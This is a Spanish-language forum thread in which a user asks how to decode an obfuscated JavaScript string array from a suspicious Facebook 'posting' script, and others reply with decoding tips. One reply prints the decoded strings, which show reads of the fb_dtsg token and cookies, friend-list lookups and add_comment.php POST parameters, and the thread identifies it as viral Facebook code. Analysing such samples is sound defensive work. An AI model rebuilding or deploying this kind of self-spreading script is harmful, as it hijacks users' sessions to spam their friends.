Hola resulta que me dieron un script que sirve para algunas cosas (publicar en fb) pero este viene con su malicia pero está codificado completamente creo que ascii y hex, pero el problema es que decodificarlo ha sido todo un reto y quisiera saber si hay alguna manera de descodificarlo.
esto es parte de lo que me han pasado.
var _0x2e14=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x32\x34\x30\x33\x30\x30\x37\x34\x36\x31\x34\x38\x39\x36\x30","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x61\x72\x6B\x61\x64\x61\x73\x6C\x61\x72\x20\x3D\x20","\x66\x6F\x72\x20\x28\x3B\x3B\x29\x3B","","\x72\x65\x70\x6C\x61\x63\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x3B","\x6C\x65\x6E\x67\x74\x68","\x65\x6E\x74\x72\x69\x65\x73","\x70\x61\x79\x6C\x6F\x61\x64","\x72\x6F\x75\x6E\x64","\x20\x40\x5B","\x75\x69\x64","\x3A","\x74\x65\x78\x74","\x5D","\x20","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72","\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79","\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D","\x26\x74\x6F\x6B\x65\x6E\x3D\x76\x37","\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F","\x69\x6E\x64\x65\x78\x4F\x66","\x55\x52\x4C","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x65\x6E\x64","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x26\x66\x74\x5F\x65\x6E\x74\x5F\x69\x64\x65\x6E\x74\x69\x66\x69\x65\x72\x3D","\x26\x63\x6F\x6D\x6D\x65\x6E\x74\x5F\x74\x65\x78\x74\x3D","\x26\x73\x6F\x75\x72\x63\x65\x3D\x32","\x26\x63\x6C\x69\x65\x6E\x74\x5F\x69\x64\x3D\x31\x33\x37\x37\x38\x37\x31\x37\x39\x37\x31\x33\x38\x3A\x31\x37\x30\x37\x30\x31\x38\x30\x39\x32","\x26\x72\x65\x70\x6C\x79\x5F\x66\x62\x69\x64","\x26\x70\x61\x72\x65\x6E\x74\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x5F\x69\x64","\x26\x72\x6F\x6F\x74\x69\x64\x3D\x75\x5F\x6A\x73\x6F\x6E\x70\x5F\x32\x5F\x33","\x26\x63\x6C\x70\x3D\x7B\x22\x63\x6C\x5F\x69\x6D\x70\x69\x64\x22\x3A\x22\x34\x35\x33\x35\x32\x34\x61\x30\x22\x2C\x22\x63\x6C\x65\x61\x72\x63\x6F\x75\x6E\x74\x65\x72\x22\x3A\x30\x2C\x22\x65\x6C\x65\x6D\x65\x6E\x74\x69\x64\x22\x3A\x22\x6A\x73\x5F\x35\x22\x2C\x22\x76\x65\x72\x73\x69\x6F\x6E\x22\x3A\x22\x78\x22\x2C\x22\x70\x61\x72\x65\x6E\x74\x5F\x66\x62\x69\x64\x22\x3A","\x7D","\x26\x61\x74\x74\x61\x63\x68\x65\x64\x5F\x73\x74\x69\x63\x6B\x65\x72\x5F\x66\x62\x69\x64\x3D\x30","\x26\x61\x74\x74\x61\x63\x68\x65\x64\x5F\x70\x68\x6F\x74\x6F\x5F\x66\x62\x69\x64\x3D\x30","\x26\x67\x69\x66\x74\x6F\x63\x63\x61\x73\x69\x6F\x6E","\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x5B\x5D","\x26\x5F\x5F\x61\x3D\x31","\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x33\x35\x79\x6E\x78\x6C\x32\x75\x35\x46\x39\x37\x4B\x65\x70\x45\x73\x79\x6F","\x26\x5F\x5F\x72\x65\x71\x3D\x71","\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x74\x74\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x2F\x61\x6A\x61\x78\x2F\x75\x66\x69\x2F\x61\x64\x64\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x2E\x70\x68\x70","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65"];
var _0xa22c=[_0x2e14[0],_0x2e14[1],_0x2e14[2],_0x2e14[3],_0x2e14[4],_0x2e14[5],_0x2e14[6],_0x2e14[7],_0x2e14[8],_0x2e14[9],_0x2e14[10],_0x2e14[11],_0x2e14[12],_0x2e14[13],_0x2e14[14],_0x2e14[15],_0x2e14[16],_0x2e14[17],_0x2e14[18],_0x2e14[19],_0x2e14[20],_0x2e14[21],_0x2e14[22],_0x2e14[23],_0x2e14[24],_0x2e14[25],_0x2e14[26],_0x2e14[27],_0x2e14[28],_0x2e14[29],_0x2e14[30],_0x2e14[31],_0x2e14[32],_0x2e14[33],_0x2e14[34],_0x2e14[35],_0x2e14[36],_0x2e14[37],_0x2e14[38],_0x2e14[39],_0x2e14[40],_0x2e14[41],_0x2e14[42],_0x2e14[43],_0x2e14[44],_0x2e14[45],_0x2e14[46],_0x2e14[47],_0x2e14[48],_0x2e14[49],_0x2e14[50],_0x2e14[51],_0x2e14[52],_0x2e14[53],_0x2e14[54],_0x2e14[55],_0x2e14[56],_0x2e14[57],_0x2e14[58],_0x2e14[59],_0x2e14[60],_0x2e14[61],_0x2e14[62],_0x2e14[63],_0x2e14[64]];
Malo el tipo, no? gracias
hmmm creo yo que es un Shell Code, pero no se cuantos bits hay ahí...
como te dije por el irc, con esta pagina puede ir descifrando manualmente http://defindit.com/ascii.html
Eso para el primer var y para el segundo solo toma los valores del primer array.
Saludos
Fortil revisa hex() bin() str() ahi tienes tu respuesta, para decifrar.
Respecto a ver cual es cual Expresiones regulares.
Regards,
Snifer
No se si te servira, pero te lo dejo
valuefb_dtsggetElementsByNamematchcookie240300746148960onreadystatechangereadyStatearkadaslar = for (;;);replaceresponseText;lengthentriespayloadround @[uid:text] &filter[0]=user&options[0]=friends_only&options[1]=nm&token=v7&viewer=&__user=https://indexOfURLGEThttps://www.facebook.com/ajax/typeahead/first_degree.php?__a=1openhttp://www.facebook.com/ajax/typeahead/first_degree.php?__a=1sendrandomfloor&ft_ent_identifier=&comment_text=&source=2&client_id=1377871797138:1707018092&reply_fbid&parent_comment_id&rootid=u_jsonp_2_3&clp={"cl_impid":"453524a0","clearcounter":0,"elementid":"js_5","version":"x","parent_fbid":}&attached_sticker_fbid=0&attached_photo_fbid=0&giftoccasion&ft[tn]=[]&__a=1&__dyn=7n8ahyj35ynxl2u5F97KepEsyo&__req=q&fb_dtsg=&ttstamp=POST/ajax/ufi/add_comment.phpContent-typeapplication/x-www-form-urlencodedsetRequestHeaderstatusclose
saludos HomeGuard
fortil no se si tienes idea de lo que es eso, es parte de un código viral de facebook.
saludos!